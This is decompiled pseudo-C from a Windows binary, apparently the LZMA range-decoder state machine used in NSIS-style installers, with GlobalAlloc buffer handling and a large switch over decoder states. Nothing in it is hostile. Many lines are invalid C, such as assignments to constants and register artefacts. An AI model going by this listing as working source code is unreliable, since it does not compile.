                                                  				void _t534;
                                                  				void* _t535;
                                                  				signed int _t536;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t589;
                                                  				signed int* _t606;
                                                  				void* _t613;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t613 - 0x40) != 0) {
                                                  						L89:
                                                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                  						L69:
                                                  						_t606 =  *(_t613 - 0x58);
                                                  						 *(_t613 - 0x84) = 0x12;
                                                  						L132:
                                                  						 *(_t613 - 0x54) = _t606;
                                                  						L133:
                                                  						_t532 =  *_t606;
                                                  						_t589 = _t532 & 0x0000ffff;
                                                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  						if( *(_t613 - 0xc) >= _t565) {
                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  							 *(_t613 - 0x40) = 1;
                                                  							_t533 = _t532 - (_t532 >> 5);
                                                  							 *_t606 = _t533;
                                                  						} else {
                                                  							 *(_t613 - 0x10) = _t565;
                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                  						}
                                                  						if( *(_t613 - 0x10) >= 0x1000000) {
                                                  							L139:
                                                  							_t534 =  *(_t613 - 0x84);
                                                  							L140:
                                                  							 *(_t613 - 0x88) = _t534;
                                                  							goto L1;
                                                  						} else {
                                                  							L137:
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 5;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  							goto L139;
                                                  						}
                                                  					} else {
                                                  						if( *(__ebp - 0x60) == 0) {
                                                  							L171:
                                                  							_t536 = _t535 | 0xffffffff;
                                                  							L172:
                                                  							return _t536;
                                                  						}
                                                  						__eax = 0;
                                                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  						0 | _t258 = _t258 + _t258 + 9;
                                                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  						L75:
                                                  						if( *(__ebp - 0x64) == 0) {
                                                  							 *(__ebp - 0x88) = 0x1b;
                                                  							L170:
                                                  							_t568 = 0x22;
                                                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                  							_t536 = 0;
                                                  							goto L172;
                                                  						}
                                                  						__eax =  *(__ebp - 0x14);
                                                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  						if(__eax >=  *(__ebp - 0x74)) {
                                                  							__eax = __eax +  *(__ebp - 0x74);
                                                  						}
                                                  						__edx =  *(__ebp - 8);
                                                  						__cl =  *(__eax + __edx);
                                                  						__eax =  *(__ebp - 0x14);
                                                  						 *(__ebp - 0x5c) = __cl;
                                                  						 *(__eax + __edx) = __cl;
                                                  						__eax = __eax + 1;
                                                  						__edx = 0;
                                                  						_t274 = __eax %  *(__ebp - 0x74);
                                                  						__eax = __eax /  *(__ebp - 0x74);
                                                  						__edx = _t274;
                                                  						__eax =  *(__ebp - 0x68);
                                                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  						_t283 = __ebp - 0x64;
                                                  						 *_t283 =  *(__ebp - 0x64) - 1;
                                                  						 *( *(__ebp - 0x68)) = __cl;
                                                  						L79:
                                                  						 *(__ebp - 0x14) = __edx;
                                                  						L80:
                                                  						 *(__ebp - 0x88) = 2;
                                                  					}
                                                  					L1:
                                                  					_t535 =  *(_t613 - 0x88);
                                                  					if(_t535 > 0x1c) {
                                                  						goto L171;
                                                  					}
                                                  					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
                                                  						case 0:
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							_t535 =  *( *(_t613 - 0x70));
                                                  							if(_t535 > 0xe1) {
                                                  								goto L171;
                                                  							}
                                                  							_t539 = _t535 & 0x000000ff;
                                                  							_push(0x2d);
                                                  							asm("cdq");
                                                  							_pop(_t570);
                                                  							_push(9);
                                                  							_pop(_t571);
                                                  							_t609 = _t539 / _t570;
                                                  							_t541 = _t539 % _t570 & 0x000000ff;
                                                  							asm("cdq");
                                                  							_t604 = _t541 % _t571 & 0x000000ff;
                                                  							 *(_t613 - 0x3c) = _t604;
                                                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                  								L10:
                                                  								if(_t612 == 0) {
                                                  									L12:
                                                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  									goto L15;
                                                  								} else {
                                                  									goto L11;
                                                  								}
                                                  								do {
                                                  									L11:
                                                  									_t612 = _t612 - 1;
                                                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                  								} while (_t612 != 0);
                                                  								goto L12;
                                                  							}
                                                  							if( *(_t613 - 4) != 0) {
                                                  								GlobalFree( *(_t613 - 4));
                                                  							}
                                                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                  							 *(_t613 - 4) = _t535;
                                                  							if(_t535 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                  								goto L10;
                                                  							}
                                                  						case 1:
                                                  							L13:
                                                  							__eflags =  *(_t613 - 0x6c);
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 1;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							_t45 = _t613 - 0x48;
                                                  							 *_t45 =  *(_t613 - 0x48) + 1;
                                                  							__eflags =  *_t45;
                                                  							L15:
                                                  							if( *(_t613 - 0x48) < 4) {
                                                  								goto L13;
                                                  							}
                                                  							_t547 =  *(_t613 - 0x40);
                                                  							if(_t547 ==  *(_t613 - 0x74)) {
                                                  								L20:
                                                  								 *(_t613 - 0x48) = 5;
                                                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                  								goto L23;
                                                  							}
                                                  							 *(_t613 - 0x74) = _t547;
                                                  							if( *(_t613 - 8) != 0) {
                                                  								GlobalFree( *(_t613 - 8));
                                                  							}
                                                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                  							 *(_t613 - 8) = _t535;
                                                  							if(_t535 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								goto L20;
                                                  							}
                                                  						case 2:
                                                  							L24:
                                                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                  							 *(_t613 - 0x84) = 6;
                                                  							 *(_t613 - 0x4c) = _t554;
                                                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                  							goto L132;
                                                  						case 3:
                                                  							L21:
                                                  							__eflags =  *(_t613 - 0x6c);
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 3;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							_t67 = _t613 - 0x70;
                                                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                  							__eflags =  *_t67;
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  							L23:
                                                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                  							if( *(_t613 - 0x48) != 0) {
                                                  								goto L21;
                                                  							}
                                                  							goto L24;
                                                  						case 4:
                                                  							goto L133;
                                                  						case 5:
                                                  							goto L137;
                                                  						case 6:
                                                  							__edx = 0;
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x34) = 1;
                                                  								 *(__ebp - 0x84) = 7;
                                                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  							__esi =  *(__ebp - 0x60);
                                                  							__cl = 8;
                                                  							__cl = 8 -  *(__ebp - 0x3c);
                                                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  							__ecx =  *(__ebp - 0x3c);
                                                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  							__ecx =  *(__ebp - 4);
                                                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  							__eflags =  *(__ebp - 0x38) - 4;
                                                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  							if( *(__ebp - 0x38) >= 4) {
                                                  								__eflags =  *(__ebp - 0x38) - 0xa;
                                                  								if( *(__ebp - 0x38) >= 0xa) {
                                                  									_t98 = __ebp - 0x38;
                                                  									 *_t98 =  *(__ebp - 0x38) - 6;
                                                  									__eflags =  *_t98;
                                                  								} else {
                                                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  								}
                                                  							} else {
                                                  								 *(__ebp - 0x38) = 0;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x34) - __edx;
                                                  							if( *(__ebp - 0x34) == __edx) {
                                                  								__ebx = 0;
                                                  								__ebx = 1;
                                                  								goto L61;
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x14);
                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                  									__eflags = __eax;
                                                  								}
                                                  								__ecx =  *(__ebp - 8);
                                                  								__ebx = 0;
                                                  								__ebx = 1;
                                                  								__al =  *((intOrPtr*)(__eax + __ecx));
                                                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  								goto L41;
                                                  							}
                                                  						case 7:
                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                  							if( *(__ebp - 0x40) != 1) {
                                                  								__eax =  *(__ebp - 0x24);
                                                  								 *(__ebp - 0x80) = 0x16;
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x28);
                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  								__eax = 0;
                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  								__al = __al & 0x000000fd;
                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  								__eax =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                  								__eflags = __eax;
                                                  								 *(__ebp - 0x58) = __eax;
                                                  								goto L69;
                                                  							}
                                                  							__eax =  *(__ebp - 4);
                                                  							__ecx =  *(__ebp - 0x38);
                                                  							 *(__ebp - 0x84) = 8;
                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  							goto L132;
                                                  						case 8:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xa;
                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x38);
                                                  								__ecx =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                  								 *(__ebp - 0x84) = 9;
                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  							}
                                                  							goto L132;
                                                  						case 9:
                                                  							goto L0;
                                                  						case 0xa:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xb;
                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x28);
                                                  							goto L88;
                                                  						case 0xb:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__ecx =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x20);
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x24);
                                                  							}
                                                  							__ecx =  *(__ebp - 0x28);
                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  							L88:
                                                  							__ecx =  *(__ebp - 0x2c);
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  							goto L89;
                                                  						case 0xc:
                                                  							L99:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xc;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t334 = __ebp - 0x70;
                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t334;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							__eax =  *(__ebp - 0x2c);
                                                  							goto L101;
                                                  						case 0xd:
                                                  							L37:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xd;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t122 = __ebp - 0x70;
                                                  							 *_t122 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t122;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L39:
                                                  							__eax =  *(__ebp - 0x40);
                                                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  								goto L48;
                                                  							}
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								goto L54;
                                                  							}
                                                  							L41:
                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  							 *(__ebp - 0x48) = __eax;
                                                  							__eax = __eax + 1;
                                                  							__eax = __eax << 8;
                                                  							__eax = __eax + __ebx;
                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edx = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								 *(__ebp - 0x40) = 1;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								__ebx = __ebx + __ebx + 1;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edx;
                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L39;
                                                  							} else {
                                                  								goto L37;
                                                  							}
                                                  						case 0xe:
                                                  							L46:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xe;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t156 = __ebp - 0x70;
                                                  							 *_t156 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t156;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							while(1) {
                                                  								L48:
                                                  								__eflags = __ebx - 0x100;
                                                  								if(__ebx >= 0x100) {
                                                  									break;
                                                  								}
                                                  								__eax =  *(__ebp - 0x58);
                                                  								__edx = __ebx + __ebx;
                                                  								__ecx =  *(__ebp - 0x10);
                                                  								__esi = __edx + __eax;
                                                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  								__ax =  *__esi;
                                                  								 *(__ebp - 0x54) = __esi;
                                                  								__edi = __ax & 0x0000ffff;
                                                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  								__eflags =  *(__ebp - 0xc) - __ecx;
                                                  								if( *(__ebp - 0xc) >= __ecx) {
                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  									__cx = __ax;
                                                  									_t170 = __edx + 1; // 0x1
                                                  									__ebx = _t170;
                                                  									__cx = __ax >> 5;
                                                  									__eflags = __eax;
                                                  									 *__esi = __ax;
                                                  								} else {
                                                  									 *(__ebp - 0x10) = __ecx;
                                                  									0x800 = 0x800 - __edi;
                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  									__ebx = __ebx + __ebx;
                                                  									 *__esi = __cx;
                                                  								}
                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                  									continue;
                                                  								} else {
                                                  									goto L46;
                                                  								}
                                                  							}
                                                  							L54:
                                                  							_t173 = __ebp - 0x34;
                                                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  							__eflags =  *_t173;
                                                  							goto L55;
                                                  						case 0xf:
                                                  							L58:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xf;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t203 = __ebp - 0x70;
                                                  							 *_t203 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t203;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L60:
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								L55:
                                                  								__al =  *(__ebp - 0x44);
                                                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  								goto L56;
                                                  							}
                                                  							L61:
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__edx = __ebx + __ebx;
                                                  							__ecx =  *(__ebp - 0x10);
                                                  							__esi = __edx + __eax;
                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								_t217 = __edx + 1; // 0x1
                                                  								__ebx = _t217;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L60;
                                                  							} else {
                                                  								goto L58;
                                                  							}
                                                  						case 0x10:
                                                  							L109:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x10;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t365 = __ebp - 0x70;
                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t365;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							goto L111;
                                                  						case 0x11:
                                                  							goto L69;
                                                  						case 0x12:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 0x58);
                                                  								 *(__ebp - 0x84) = 0x13;
                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							__eflags = __eax;
                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  							goto L130;
                                                  						case 0x13:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								_t469 = __ebp - 0x58;
                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  								__eflags =  *_t469;
                                                  								 *(__ebp - 0x30) = 0x10;
                                                  								 *(__ebp - 0x40) = 8;
                                                  								L144:
                                                  								 *(__ebp - 0x7c) = 0x14;
                                                  								goto L145;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							 *(__ebp - 0x30) = 8;
                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  							L130:
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							 *(__ebp - 0x40) = 3;
                                                  							goto L144;
                                                  						case 0x14:
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  							__eax =  *(__ebp - 0x80);
                                                  							goto L140;
                                                  						case 0x15:
                                                  							__eax = 0;
                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  							__al = __al & 0x000000fd;
                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  							goto L120;
                                                  						case 0x16:
                                                  							__eax =  *(__ebp - 0x30);
                                                  							__eflags = __eax - 4;
                                                  							if(__eax >= 4) {
                                                  								_push(3);
                                                  								_pop(__eax);
                                                  							}
                                                  							__ecx =  *(__ebp - 4);
                                                  							 *(__ebp - 0x40) = 6;
                                                  							__eax = __eax << 7;
                                                  							 *(__ebp - 0x7c) = 0x19;
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							goto L145;
                                                  						case 0x17:
                                                  							L145:
                                                  							__eax =  *(__ebp - 0x40);
                                                  							 *(__ebp - 0x50) = 1;
                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  							goto L149;
                                                  						case 0x18:
                                                  							L146:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x18;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
